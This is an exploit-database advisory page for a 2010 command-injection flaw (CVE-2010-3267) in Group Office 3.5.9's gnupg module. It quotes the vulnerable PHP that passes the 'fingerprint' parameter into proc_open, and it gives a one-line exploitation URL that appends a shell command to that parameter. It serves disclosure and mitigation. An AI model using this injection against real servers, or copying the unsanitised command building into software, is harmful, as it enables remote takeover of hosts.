header-logo
Suggest Exploit
vendor:
Group Office
by:
ADEO Security
8,8
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Group Office
Affected Version From: 3.5.9
Affected Version To: 3.5.9
Patch Exists: Yes
Related CWE: CVE-2010-3267
CPE: a:group-office:group-office
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Group Office Remote Command Execution Vulnerability

Remote attacker can execute commands on the system that host target web application. Its high level vulnerability. Attacker needs gnupg module that installed. In json.php export method called with HTTP Request that's name fingerprint. In the export method, variable $fingerprint passed to run_cmd method.

Mitigation:

Upgrade to the latest version of Group Office.
Source

Exploit-DB raw data:

# Title
Group Office Remote Command Execution Vulnerability

# Author
ADEO Security

# Published
16/07/2010

# Version
3.5.9 (Possible all versions)

# Vendor
http://www.group-office.com

# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download

# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and e-mail online with co-workers and clients. Easy
to use and fully customizable, Group-Office takes online collaboration
to the next level."

# Credit
Vulnerability founded by Canberk BOLAT
	- Mail: security[AT]adeo.com.tr
	- Web: http://security.adeo.com.tr , http://adeosecuritylabs.com

# Vulnerability
Remote attacker can execute commands on the system that host target
web application. Its high level vulnerability. Attacker needs gnupg
module that installed.

modules/gnupg/json.php:
$data = $gnupg->export($_REQUEST['fingerprint']);


In json.php export method called with HTTP Request that's name
fingerprint. In the export method, variable $fingerprint passed to
run_cmd method.

modules/gnupg/classes/gnupg.class.inc.php:
public function export($fingerprint)
{
	$this->run_cmd('--armor --export '.$fingerprint, $key);
...
private function run_cmd($cmd, &$output=null, &$errorcode=null,
$data=null, $passphrase=null, $background=false)
{
...
	$complete_cmd .= ' '.$cmd;
...
$p = proc_open($complete_cmd,$this->fd, $this->pipes);
...

'complete_cmd' variable executed by application and if attacker
manipulate request 'fingerprint' application executes attackers
malicious codes.


# Exploitation
http://server/groupoffice/modules/gnupg/json.php?task=send_key&fingerprint=xyz;COMMAND

Navigation

Suggest Exploit

Services By CQR